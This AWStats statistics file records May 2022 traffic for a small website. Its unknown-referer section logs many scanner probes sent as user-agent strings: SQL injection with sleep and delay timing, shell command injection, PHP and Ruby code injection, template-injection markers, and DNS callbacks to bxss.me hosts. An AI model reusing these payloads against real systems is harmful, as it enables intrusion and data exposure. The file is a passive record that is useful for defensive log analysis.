File: /home/accemeff/tmp/awstats/ssl/awstats052022.acc.emeff.ca.txt
AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202205 will be lost/reset.
# Last config file used to build this data file was /home/accemeff/tmp/awstats/ssl/awstats.acc.emeff.ca.conf.
# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2013
POS_TIME 2691
POS_VISITOR 651972
POS_DAY 663684
POS_DOMAIN 3511
POS_LOGIN 4145
POS_ROBOT 4300
POS_WORMS 4853
POS_EMAILSENDER 4984
POS_EMAILRECEIVER 5127
POS_SESSION 664500
POS_SIDER 664707
POS_FILETYPES 5262
POS_DOWNLOADS 5612
POS_OS 5709
POS_BROWSER 6020
POS_SCREENSIZE 7614
POS_UNKNOWNREFERER 7688
POS_UNKNOWNREFERERBROWSER 41831
POS_ORIGIN 75568
POS_SEREFERRALS 75722
POS_PAGEREFS 75913
POS_SEARCHWORDS 94054
POS_KEYWORDS 94818
POS_MISC 2355
POS_ERRORS 95491
POS_CLUSTER 4001
POS_SIDER_404 95636
END_MAP
# LastLine = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime = Date of first visit for history file
# LastTime = Date of last visit for history file
# LastUpdate = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20220601001029 55 11471 5896832290597
FirstTime 20220501012146
LastTime 20220531210442
LastUpdate 20220601080602 55 0 54 0 0
TotalVisits 565
TotalUnique 305
MonthHostsKnown 0
MonthHostsUnknown 305
END_GENERAL
# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
RealPlayerSupport 0 0 0
PDFSupport 0 0 0
FlashSupport 0 0 0
AddToFavourites 0 0 0
WindowsMediaPlayerSupport 0 0 0
DirectorSupport 0 0 0
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
TotalMisc 0 0 0
END_MISC
# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 20 20 31134 52 55 4703
1 47 47 829710 28 36 6996
2 13 13 12896 29 33 5047
3 42 42 750182 37 40 10912
4 1313 1399 17027876 4876 6228 106237
5 2111 2327 14908031 4131 7623 25956
6 4256 4449 26756938 500 2838 32856
7 11984 12408 39972968 2048 2064 487006
8 1081 1081 28500202 647 670 479735
9 17 17 15872 62 78 5204
10 29 29 73955 38 43 43481
11 24 24 102882 50 52 126338
12 26 26 93683 52 55 7447
13 24 24 117615 36 39 5498
14 25 25 57815 35 44 43674
15 58 58 1605531 28 32 2262
16 23 23 56713 33 37 39512
17 18 18 29155 57 62 5151
18 26 26 70980 35 47 5376
19 41 41 131075 42 48 8439
20 27 27 105880 37 40 41565
21 16 16 27173 49 53 4081
22 43 43 798538 29 32 8928
23 44 44 800759 23 27 4072
END_TIME
# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 30
zz 20571 21490 125789387
us 314 314 2071016
gb 122 122 3239372
ru 101 101 157064
cn 51 51 336247
ca 33 33 81300
nl 30 30 738278
in 16 16 38469
bg 14 14 13888
pl 8 8 98318
il 6 6 5952
fr 5 5 16260
ao 4 4 3968
ir 4 4 26564
dk 4 4 3968
lb 3 3 36866
br 3 3 14275
de 3 3 36863
at 2 2 1984
gr 2 2 13281
ch 2 2 76516
id 2 2 1984
vn 1 1 12296
eu 1 1 12288
se 1 1 992
tr 1 1 12293
me 1 1 12292
jp 1 1 12293
my 1 1 12297
mn 1 1 992
END_DOMAIN
# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER
# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN
# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 11
perl 168 811092 20220520081248 0
no_user_agent 131 202480 20220531180014 0
Googlebot/ 26 132828 20220520061803 0
(firefox/)([0-9]\.|[0-1][0]\.) 11 10912 20220531070632 0
survey 8 194210 20220531205112 0
unknown 8 104 20220526162948 8
Go\-http\-client/ 5 4960 20220530045958 0
curl 3 2976 20220519031955 0
Firefox/1\.5 1 992 20220516220548 0
Apache\-HttpClient/ 1 992 20220529223903 0
libwww\-perl 1 992 20220502170408 0
END_ROBOT
# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS
# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER
# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER
# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 15
txt 378 474012 0 0
config 8 245552 0 0
css 118 493037 0 0
env 12 147467 0 0
jpg 1 40972 0 0
ini 98 2529966 0 0
js 415 9006463 0 0
Unknown 633 4978909 0 0
json 16 491122 0 0
jsp 14 373384 0 0
html 20343 108187952 0 0
xml 139 5063247 0 0
gif 7 78915 0 0
php 44 759484 0 0
cgi 1 7081 0 0
END_FILETYPES
# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 1
/acc/js/prototype/window_readme.txt 384 0 481536
END_DOWNLOADS
# OS ID - Hits
BEGIN_OS ID - Hits - Pages 17
linuxubuntu 37 37
macosx12 6 6
win7 17 17
androidnougat 2 2
macosx15 24 24
symbian 1 1
macosx9 2 2
winxp 3 3
androidoreo 1 1
Unknown 1449 1403
win8.1 2 2
androidmarshmallow 1 1
macosx11 17 17
android 27 27
linux 24 24
win10 20611 19738
win8 3 3
END_OS
# Browser ID - Hits - Pages
BEGIN_BROWSER 72
firefox64.0 1 1
chrome98.0.4758.132 1 1
chrome54.0.2840.98 6 6
chrome36.0.1944.0 1 1
chrome83.0.4103.61 2 2
chrome68.0.3440.106 1 1
chrome63.0.3239.132 4 4
chrome50.0.2661.102 4 4
chrome99.0.4844.51 2 2
chrome80.0.3987.149 40 40
firefox58.0 2 2
chrome92.0.4515.159 1 1
msie8.0 2 2
firefox73.0 4 4
chrome87.0.4280.141 26 26
chrome92.0.4515.107 1 1
firefox65.0 2 2
nokia 1 1
chrome72.0.3626.121 1 1
chrome37.0.2049.0 1 1
mozilla 50 50
firefox78.0 3 3
chrome42.0.2311.90 3 3
chrome76.0.3809.100 1 1
chrome66.0.3359.117 3 3
chrome53.0.3077.80 1 1
edge12 3 3
chrome29.0.1547.62 1 1
chrome79.0.3945.130 1 1
chrome88.0.4240.193 19 19
chrome35.0.2309.372 1 1
safari9.0.2 3 3
chrome89.0.4389.114 2 2
chrome60.0.3112.90 1 1
chrome54.0.3021.98 1 1
chrome60.0.3112.113 124 124
safari14.1.1 1 1
chrome71.0.3578.98 1 1
chrome91.0.4472.114 1 1
chrome52.0.2762.73 1 1
w3m 1 1
chrome87.0.4472.114 1 1
chrome41.0.2228.0 4 4
chrome34.0.1847.137 1 1
chrome81.0.4044.129 3 3
chrome79.0.3945.93 1 1
chrome45.0.2454.101 5 5
chrome86.0.4 3 3
firefox76.0 1 1
chrome92.0.4512.0 20190 19317
firefox62.0 34 34
chrome70.0.3538.77 5 5
chrome100.0.4896.58 1 1
chrome74.0.3729.169 3 3
chrome60.0.3034.50 1 1
chrome98.0.4758.102 9 9
chrome89.0.4389.90 2 2
chrome95.0.4638.69 8 8
chrome74.0.3729.131 5 5
Unknown 1362 1316
netscape5.0 36 36
chrome49.0.2623.112 4 4
firefox77.0 23 23
chrome78.0.3904.108 178 178
firefox83.0 2 2
firefox47.0 10 10
chrome99.0.4844.84 2 2
chrome74.0.3729.157 1 1
chrome41.0.2225.0 1 1
chrome81.0.4044.138 1 1
chrome88.0.4324.190 3 3
firefox79.0 2 2
END_BROWSER
# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE
# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 519
zK5VXrAJ')_OR_193=(SELECT_193_FROM_PG_SLEEP(15))-- 20220520075043
(select(0)from(select(sleep(15)))v)/*'_(select(0)from(select(sleep(15)))v)_'\ 20220520081451
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20220530222746
';print(md5(31337));$a=' 20220520081433
2stqMYjm'))_OR_852=(SELECT_852_FROM_PG_SLEEP(15))-- 20220520073934
1a2t4K64O 20220520075447
&echo_cdcnri$()\\_lcmhte\\nz^xyu||a_#'_&echo_cdcnri$()\\_lcmhte\\nz^xyu||a_#|\ 20220520073900
lAqBXIDe 20220520080137
'.gethostbyname(lc('hitko'.'otoxvntl8328b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(90).chr(114).chr(86).' 20220520074634
1_waitfor_delay_'0:0:15'_-- 20220520081501
|echo_uyplnp$()\\_bebmcd\\nz^xyu||a_#'_|echo_uyplnp$()\\_bebmcd\\nz^xyu||a_#|\ 20220520074748
gKAdGhdA'))_OR_329=(SELECT_329_FROM_PG_SLEEP(15))-- 20220520075430
chF1Ta7S';_waitfor_delay_'0:0:15'_-- 20220520074541
Svq6UDI5')_OR_628=(SELECT_628_FROM_PG_SLEEP(15))-- 20220520081525
EqTzDo0i')_OR_684=(SELECT_684_FROM_PG_SLEEP(15))-- 20220520075532
&echo_hyvvuk$()\\_rtimoi\\nz^xyu||a_#'_&echo_hyvvuk$()\\_rtimoi\\nz^xyu||a_#|\ 20220520073953
'_'A'.concat(70-3).concat(22*4).concat(107).concat(87).concat(101).concat(73)_(require'socket'_Socket.gethostbyname('hituv'_'spixrjwxbe4cb.bxss.me.')[3].to_s)_' 20220520074705
-1'_OR_2_365-365-1=0_0_0_1_or_'lpkT3YDw'=' 20220520073818
@@2pjTE 20220520075030
|echo_nrobdj$()\\_jwgoqi\\nz^xyu||a_#'_|echo_nrobdj$()\\_jwgoqi\\nz^xyu||a_#|\ 20220520075035
'_'A'.concat(70-3).concat(22*4).concat(112).concat(88).concat(121).concat(85)_(require'socket'_Socket.gethostbyname('hitau'_'crcbzruda99a3.bxss.me.')[3].to_s)_' 20220520075002
W3BxQBNM';_waitfor_delay_'0:0:15'_-- 20220520074753
cbBIumLb';_waitfor_delay_'0:0:15'_-- 20220520075531
|echo_aocwtu$()\\_uudqcv\\nz^xyu||a_#'_|echo_aocwtu$()\\_uudqcv\\nz^xyu||a_#|\ 20220520074515
-1'_OR_2_285-285-1=0_0_0_1_-- 20220520074534
Mozilla/5.0_NetSeen/1.0 20220529055804
-1_OR_2_835-835-1=0_0_0_1_-- 20220520074753
|echo_seowiu$()\\_kdfkad\\nz^xyu||a_#'_|echo_seowiu$()\\_kdfkad\\nz^xyu||a_#|\ 20220520074827
b6b5CnCS')_OR_417=(SELECT_417_FROM_PG_SLEEP(15))-- 20220520074754
-1'_OR_2_991-991-1=0_0_0_1_or_'mqR51dTN'=' 20220520075422
@@SUr6T 20220520074830
'.gethostbyname(lc('hitex'.'tqmbshgi835b5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(77).chr(120).chr(84).' 20220520074003
1some_inexistent_file_with_long_name%00.36 20220520081316
jihFzCHz')_OR_891=(SELECT_891_FROM_PG_SLEEP(15))-- 20220520075834
'.gethostbyname(lc('hityf'.'tqfbspkc1b831.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(69).chr(112).chr(68).' 20220520075118
QDvysxmz'_OR_772=(SELECT_772_FROM_PG_SLEEP(15))-- 20220520075027
-1'_OR_2_464-464-1=0_0_0_1_-- 20220520080150
echo_ozaquf$()\\_aasmxj\\nz^xyu||a_#'_&echo_ozaquf$()\\_aasmxj\\nz^xyu||a_#|\ 20220520073859
-1'_OR_2_144-144-1=0_0_0_1_or_'IeFqZEDO'=' 20220520075518
&echo_jduhab$()\\_eofrae\\nz^xyu||a_#'_&echo_jduhab$()\\_eofrae\\nz^xyu||a_#|\ 20220520080718
-1'_OR_2_861-861-1=0_0_0_1_-- 20220520073803
@@KTkwR 20220520073935
'.gethostbyname(lc('hitfm'.'ulcxajjvd14f1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(87).chr(114).chr(76).' 20220520081315
&echo_yxnvrr$()\\_dafndi\\nz^xyu||a_#'_&echo_yxnvrr$()\\_dafndi\\nz^xyu||a_#|\ 20220520074016
1mlqve5eO 20220520074912
1'\ 20220520081544
RCzzCr0O')_OR_77=(SELECT_77_FROM_PG_SLEEP(15))-- 20220520074801
@@6kgpU 20220520073805
8yostcKP 20220520074530
${9999246_9999090} 20220520075207
|echo_vpgalj$()\\_conutt\\nz^xyu||a_#'_|echo_vpgalj$()\\_conutt\\nz^xyu||a_#|\ 20220520075602
2hMJArQj')_OR_81=(SELECT_81_FROM_PG_SLEEP(15))-- 20220520073820
@@7tzDP 20220520081557
echo_cmfahb$()\\_hhjdwa\\nz^xyu||a_#'_&echo_cmfahb$()\\_hhjdwa\\nz^xyu||a_#|\ 20220520074549
ESVQqTDn 20220520075023
ffCLptzd 20220520074822
echo_aivoor$()\\_fxufkx\\nz^xyu||a_#'_&echo_aivoor$()\\_fxufkx\\nz^xyu||a_#|\ 20220520075416
bxss.me/t/xss.html?%00 20220520081428
&echo_luvgnl$()\\_nipfxs\\nz^xyu||a_#'_&echo_luvgnl$()\\_nipfxs\\nz^xyu||a_#|\ 20220520074735
-1_OR_2_294-294-1=0_0_0_1_-- 20220520075114
-1'_OR_2_517-517-1=0_0_0_1_-- 20220520073818
-1_OR_2_177-177-1=0_0_0_1_-- 20220520074626
-1'_OR_2_123-123-1=0_0_0_1_or_'k49YTxzN'=' 20220520075832
@@l9wg2 20220520075606
-1_OR_2_69-69-1=0_0_0_1_-- 20220520073800
QKrG3KyX';_waitfor_delay_'0:0:15'_-- 20220520075429
04dLtLGG';_waitfor_delay_'0:0:15'_-- 20220520075522
12345'\ 20220520081212
CBBWln3T')_OR_399=(SELECT_399_FROM_PG_SLEEP(15))-- 20220520073802
QWpPt1CB'_OR_270=(SELECT_270_FROM_PG_SLEEP(15))-- 20220520074926
1yHIrkSYO 20220520074729
-1_OR_2_156-156-1=0_0_0_1_-- 20220520075559
B38UzJEL'))_OR_332=(SELECT_332_FROM_PG_SLEEP(15))-- 20220520074754
${9999171_10000264} 20220520074019
-1'_OR_2_454-454-1=0_0_0_1_or_'2803hc9M'=' 20220520081417
|echo_zbrpid$()\\_pidpan\\nz^xyu||a_#'_|echo_zbrpid$()\\_pidpan\\nz^xyu||a_#|\ 20220520080038
|echo_pjxwbb$()\\_xoipge\\nz^xyu||a_#'_|echo_pjxwbb$()\\_xoipge\\nz^xyu||a_#|\ 20220520073929
@@tT8VC 20220520075835
@@NcX0H 20220520075924
-1'_OR_2_742-742-1=0_0_0_1_or_'gKljIbcF'=' 20220520074759
-1_OR_2_600-600-1=0_0_0_1 20220520075002
-1'_OR_2_151-151-1=0_0_0_1_or_'wEOR3y0F'=' 20220520075324
|echo_srjqdq$()\\_vifsiw\\nz^xyu||a_#'_|echo_srjqdq$()\\_vifsiw\\nz^xyu||a_#|\ 20220520075417
bs2zGtVT';_waitfor_delay_'0:0:15'_-- 20220520075921
1TIENYNIO 20220520081119
|echo_gethdi$()\\_jqlnjc\\nz^xyu||a_#'_|echo_gethdi$()\\_jqlnjc\\nz^xyu||a_#|\ 20220520073954
BBJdJfhm';_waitfor_delay_'0:0:15'_-- 20220520074455
1M7dRyzYO 20220520074538
-1'_OR_2_172-172-1=0_0_0_1_-- 20220520075918
-1_OR_2_550-550-1=0_0_0_1 20220520074754
DkCBxMpa'))_OR_750=(SELECT_750_FROM_PG_SLEEP(15))-- 20220520073802
-1'_OR_2_956-956-1=0_0_0_1_or_'f7TU4cF8'=' 20220520075919
P4pF7X4c 20220520075527
dtB6EuBm';_waitfor_delay_'0:0:15'_-- 20220520080946
r8adW0QI'_OR_666=(SELECT_666_FROM_PG_SLEEP(15))-- 20220520074541
-1_OR_2_374-374-1=0_0_0_1_-- 20220520074444
-1_OR_2_173-173-1=0_0_0_1 20220520075316
-1_OR_2_879-879-1=0_0_0_1 20220520075421
-1_OR_2_606-606-1=0_0_0_1 20220520081408
|echo_hwmodk$()\\_lacjzh\\nz^xyu||a_#'_|echo_hwmodk$()\\_lacjzh\\nz^xyu||a_#|\ 20220520080721
|echo_ichgqn$()\\_pgtpia\\nz^xyu||a_#'_|echo_ichgqn$()\\_pgtpia\\nz^xyu||a_#|\ 20220520075919
4UJ2peP0';_waitfor_delay_'0:0:15'_-- 20220520074827
-1_OR_2_677-677-1=0_0_0_1_-- 20220520081406
'.gethostbyname(lc('hittv'.'lxjcpudocd5be.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(82).chr(117).chr(84).' 20220520080822
TuDRhMf2 20220520075036
-1_OR_2_444-444-1=0_0_0_1 20220520075528
'_'A'.concat(70-3).concat(22*4).concat(110).concat(81).concat(120).concat(85)_(require'socket'_Socket.gethostbyname('hitck'_'qkfioaykcc36b.bxss.me.')[3].to_s)_' 20220520073918
-1_OR_2_684-684-1=0_0_0_1_-- 20220520073817
-1'_OR_2_349-349-1=0_0_0_1_or_'sUaL9fb0'=' 20220520073803
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 20220520081436
@@V7nbX 20220520075431
-1'_OR_2_606-606-1=0_0_0_1_-- 20220520075037
-1'_OR_2_21-21-1=0_0_0_1_-- 20220520075116
echo_ifisuw$()\\_syfqvh\\nz^xyu||a_#'_&echo_ifisuw$()\\_syfqvh\\nz^xyu||a_#|\ 20220520075000
IbjYNr2O')_OR_594=(SELECT_594_FROM_PG_SLEEP(15))-- 20220520073934
5SchxmkV'_OR_740=(SELECT_740_FROM_PG_SLEEP(15))-- 20220520080954
-1_OR_2_331-331-1=0_0_0_1_-- 20220520074823
|echo_wyelxj$()\\_ydijtp\\nz^xyu||a_#'_|echo_wyelxj$()\\_ydijtp\\nz^xyu||a_#|\ 20220520075529
@@GPkrA 20220520081043
'.gethostbyname(lc('hitph'.'qlnnitbv846c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(83).chr(112).chr(85).' 20220520074528
@@meGjk 20220520075420
v2Ni0qVn'_OR_973=(SELECT_973_FROM_PG_SLEEP(15))-- 20220520073801
Ez5crtGi';_waitfor_delay_'0:0:15'_-- 20220520075027
1MxFtnXrO 20220520073812
1VA08g7iO 20220520074816
echo_ptmzee$()\\_tkohnk\\nz^xyu||a_#'_&echo_ptmzee$()\\_tkohnk\\nz^xyu||a_#|\ 20220520073928
-1'_OR_2_708-708-1=0_0_0_1_or_'2oGG64Bv'=' 20220520074536
-1_OR_2_722-722-1=0_0_0_1 20220520073803
-1'_OR_2_84-84-1=0_0_0_1_or_'ZYdyALRl'=' 20220520074447
-1'_OR_2_479-479-1=0_0_0_1_-- 20220520074627
'.gethostbyname(lc('hitpp'.'ihhjmhom7d926.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(82).chr(112).chr(90).' 20220520074804
-1_OR_2_920-920-1=0_0_0_1 20220520075037
Yd0y2Bns')_OR_159=(SELECT_159_FROM_PG_SLEEP(15))-- 20220520075603
'_'A'.concat(70-3).concat(22*4).concat(108).concat(68).concat(99).concat(67)_(require'socket'_Socket.gethostbyname('hitcz'_'cvrfewpzc460a.bxss.me.')[3].to_s)_' 20220520080200
1v5pxVrpO 20220520080636
|echo_zfwsbe$()\\_xpjoxz\\nz^xyu||a_#'_|echo_zfwsbe$()\\_xpjoxz\\nz^xyu||a_#|\ 20220520075211
${9999853_10000108} 20220520075023
-1_OR_2_400-400-1=0_0_0_1 20220520080839
\ 20220520081449
@@y8iFy 20220520080300
echo_uvqplr$()\\_pgazlj\\nz^xyu||a_#'_&echo_uvqplr$()\\_pgazlj\\nz^xyu||a_#|\ 20220520074432
xhju6lkS 20220520073800
echo_vqpbqy$()\\_njyeij\\nz^xyu||a_#'_&echo_vqpbqy$()\\_njyeij\\nz^xyu||a_#|\ 20220520080715
'_'A'.concat(70-3).concat(22*4).concat(103).concat(66).concat(97).concat(83)_(require'socket'_Socket.gethostbyname('hitvv'_'ywukmqqk12f47.bxss.me.')[3].to_s)_' 20220520074853
'_'A'.concat(70-3).concat(22*4).concat(110).concat(71).concat(98).concat(84)_(require'socket'_Socket.gethostbyname('hitma'_'vvkvvgtp65691.bxss.me.')[3].to_s)_' 20220520081028
|echo_mptoug$()\\_kqaaqa\\nz^xyu||a_#'_|echo_mptoug$()\\_kqaaqa\\nz^xyu||a_#|\ 20220520075015
&echo_peaphu$()\\_gecwpa\\nz^xyu||a_#'_&echo_peaphu$()\\_gecwpa\\nz^xyu||a_#|\ 20220520073814
-1'_OR_2_662-662-1=0_0_0_1_or_'T3B2YNIF'=' 20220520075528
SaEHkjnl'_OR_268=(SELECT_268_FROM_PG_SLEEP(15))-- 20220520074800
@@bMKB7 20220520075533
${9999780_9999593} 20220520080027
'_'A'.concat(70-3).concat(22*4).concat(105).concat(82).concat(112).concat(79)_(require'socket'_Socket.gethostbyname('hitfi'_'hxmfhmnm95e07.bxss.me.')[3].to_s)_' 20220520074532
echo_dzjcrw$()\\_osmvyy\\nz^xyu||a_#'_&echo_dzjcrw$()\\_osmvyy\\nz^xyu||a_#|\ 20220520075112
-1_OR_2_710-710-1=0_0_0_1_-- 20220520074920
|echo_elbvof$()\\_fhstpe\\nz^xyu||a_#'_|echo_elbvof$()\\_fhstpe\\nz^xyu||a_#|\ 20220520074736
@@ulwQy 20220520074927
-1'_OR_2_709-709-1=0_0_0_1_or_'FBx4khdD'=' 20220520080153
&echo_artvpd$()\\_bcayrr\\nz^xyu||a_#'_&echo_artvpd$()\\_bcayrr\\nz^xyu||a_#|\ 20220520074647
echo_xntjvf$()\\_adfuns\\nz^xyu||a_#'_&echo_xntjvf$()\\_adfuns\\nz^xyu||a_#|\ 20220520073953
1GaHorNtO 20220520074644
1I0FQ2NAO 20220520073759
-1_OR_2_881-881-1=0_0_0_1 20220520074559
1H8TiXZGO 20220520075517
cIqkZyv7 20220520080830
AefI8jOU';_waitfor_delay_'0:0:15'_-- 20220520074635
-1'_OR_2_172-172-1=0_0_0_1_or_'5P0CpvaT'=' 20220520074921
hD4tTpu0 20220520074647
7e7munBE')_OR_354=(SELECT_354_FROM_PG_SLEEP(15))-- 20220520075120
1cvoHNcIO 20220520075847
bxss.me 20220520081327
zG4isY1b'_OR_473=(SELECT_473_FROM_PG_SLEEP(15))-- 20220520075010
ELv3TlqY'))_OR_18=(SELECT_18_FROM_PG_SLEEP(15))-- 20220520080241
'.gethostbyname(lc('hitag'.'wrlaslop33f2f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(87).chr(116).chr(86).' 20220520075432
Expanse_indexes_customers\xe2\x80\x99_network_perimeters._If_you_have_any_questions_or_concerns,_please_reach_out_to:_scaninfo@expanseinc.com. 20220504054344
-1_OR_2_563-563-1=0_0_0_1_-- 20220520080141
-1'_OR_2_64-64-1=0_0_0_1_-- 20220520073801
${9999805_9999399} 20220520074442
@@d00bu 20220520074803
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20220531210442
-1'_OR_2_662-662-1=0_0_0_1_-- 20220520075528
echo_yvkpcb$()\\_rrclol\\nz^xyu||a_#'_&echo_yvkpcb$()\\_rrclol\\nz^xyu||a_#|\ 20220520074620
-1_OR_2_55-55-1=0_0_0_1 20220520075559
-1_OR_2_315-315-1=0_0_0_1_-- 20220520075918
'_'A'.concat(70-3).concat(22*4).concat(99).concat(69).concat(115).concat(76)_(require'socket'_Socket.gethostbyname('hitss'_'bceonyose40c0.bxss.me.')[3].to_s)_' 20220520075947
'.gethostbyname(lc('hitzm'.'bvrhwikaf1cb1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(80).chr(110).chr(65).' 20220520074700
'_'A'.concat(70-3).concat(22*4).concat(116).concat(77).concat(122).concat(67)_(require'socket'_Socket.gethostbyname('hitrh'_'tloclozf666b7.bxss.me.')[3].to_s)_' 20220520074810
echo_ykmlqc$()\\_smsmns\\nz^xyu||a_#'_&echo_ykmlqc$()\\_smsmns\\nz^xyu||a_#|\ 20220520075204
tiGmW795'))_OR_354=(SELECT_354_FROM_PG_SLEEP(15))-- 20220520074801
&echo_ysfcdu$()\\_jprfms\\nz^xyu||a_#'_&echo_ysfcdu$()\\_jprfms\\nz^xyu||a_#|\ 20220520075919
-1_OR_2_919-919-1=0_0_0_1 20220520075918
CoRpG4Jj'_OR_826=(SELECT_826_FROM_PG_SLEEP(15))-- 20220520075603
43eP9PGZ 20220520073803
'.gethostbyname(lc('hitdp'.'htidpfkk02f67.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(74).chr(112).chr(75).' 20220520075930
&echo_kyhtto$()\\_wwuljo\\nz^xyu||a_#'_&echo_kyhtto$()\\_wwuljo\\nz^xyu||a_#|\ 20220520075528
P4uHfsgG')_OR_50=(SELECT_50_FROM_PG_SLEEP(15))-- 20220520080236
-1_OR_2_325-325-1=0_0_0_1 20220520080146
-1_OR_2_672-672-1=0_0_0_1 20220520074647
&echo_ixdqzs$()\\_llmriz\\nz^xyu||a_#'_&echo_ixdqzs$()\\_llmriz\\nz^xyu||a_#|\ 20220520080035
echo_dwxksa$()\\_ysnsvi\\nz^xyu||a_#'_&echo_dwxksa$()\\_ysnsvi\\nz^xyu||a_#|\ 20220520074016
IWf8FtRo')_OR_627=(SELECT_627_FROM_PG_SLEEP(15))-- 20220520081012
-1'_OR_2_274-274-1=0_0_0_1_or_'Qw5Jsr1Q'=' 20220520074823
-1'_OR_2_286-286-1=0_0_0_1_or_'wszy1lfC'=' 20220520074751
'_'A'.concat(70-3).concat(22*4).concat(122).concat(84).concat(121).concat(86)_(require'socket'_Socket.gethostbyname('hitlu'_'dqtpanwfe1ead.bxss.me.')[3].to_s)_' 20220520075540
|echo_aunlay$()\\_qkgbnb\\nz^xyu||a_#'_|echo_aunlay$()\\_qkgbnb\\nz^xyu||a_#|\ 20220520075901
-1_OR_2_18-18-1=0_0_0_1 20220520073931
RzpNofQK'_OR_212=(SELECT_212_FROM_PG_SLEEP(15))-- 20220520074650
@@UIwuF 20220520073803
UsLi3ltE';_waitfor_delay_'0:0:15'_-- 20220520075356
-1'_OR_2_636-636-1=0_0_0_1_-- 20220520074921
K3IZ7zOx'_OR_167=(SELECT_167_FROM_PG_SLEEP(15))-- 20220520074827
${9999825_10000305} 20220520073816
1efLYNrzO 20220520073758
'_'A'.concat(70-3).concat(22*4).concat(109).concat(87).concat(118).concat(76)_(require'socket'_Socket.gethostbyname('hitbl'_'oqmauvja6c695.bxss.me.')[3].to_s)_' 20220520075031
'_'A'.concat(70-3).concat(22*4).concat(117).concat(65).concat(111).concat(74)_(require'socket'_Socket.gethostbyname('hitcr'_'glgpbnnfb2f03.bxss.me.')[3].to_s)_' 20220520073946
@@erSO3 20220520074652
-1_OR_2_383-383-1=0_0_0_1_-- 20220520080834
-1'_OR_2_549-549-1=0_0_0_1_or_'YHE3TXwq'=' 20220520080847
@@geIIx 20220520073802
vLUJz2Z7'))_OR_847=(SELECT_847_FROM_PG_SLEEP(15))-- 20220520074542
'.gethostbyname(lc('hitxe'.'dzizwjimaeac7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(71).chr(98).chr(87).' 20220520073917
z4JLAgcf')_OR_72=(SELECT_72_FROM_PG_SLEEP(15))-- 20220520074651
UuNBfW6M'_OR_343=(SELECT_343_FROM_PG_SLEEP(15))-- 20220520073934
1rm8EzzIO 20220520074947
7esqFh8z'_OR_946=(SELECT_946_FROM_PG_SLEEP(15))-- 20220520075042
'_'A'.concat(70-3).concat(22*4).concat(104).concat(70).concat(108).concat(79)_(require'socket'_Socket.gethostbyname('hitss'_'pxqxgbvg1e91d.bxss.me.')[3].to_s)_' 20220520075909
https://gdnplus.com:Gather_Analyze_Provide. 20220527005708
'.gethostbyname(lc('hitvx'.'yhqvxykoff14e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(71).chr(113).chr(87).' 20220520080102
echo_krmuqh$()\\_sjqauw\\nz^xyu||a_#'_&echo_krmuqh$()\\_sjqauw\\nz^xyu||a_#|\ 20220520075900
VbxyVIg4'))_OR_485=(SELECT_485_FROM_PG_SLEEP(15))-- 20220520074604
'.print(md5(31337)).' 20220520081452
-1_OR_2_205-205-1=0_0_0_1_-- 20220520075036
@@1elpm 20220520075525
@@NiNnz 20220520074646
HpVn74oY'))_OR_923=(SELECT_923_FROM_PG_SLEEP(15))-- 20220520081531
@@j6DY0 20220520074543
|echo_eiznov$()\\_mrfcxz\\nz^xyu||a_#'_|echo_eiznov$()\\_mrfcxz\\nz^xyu||a_#|\ 20220520075002
'_'A'.concat(70-3).concat(22*4).concat(103).concat(73).concat(103).concat(80)_(require'socket'_Socket.gethostbyname('hitpa'_'oenzwput57bdf.bxss.me.')[3].to_s)_' 20220520074939
-1_OR_2_744-744-1=0_0_0_1_-- 20220520074749
6rcCoZR1';_waitfor_delay_'0:0:15'_-- 20220520080228
&echo_igzeov$()\\_tlkuef\\nz^xyu||a_#'_&echo_igzeov$()\\_tlkuef\\nz^xyu||a_#|\ 20220520074921
WAFB1z31 20220520075420
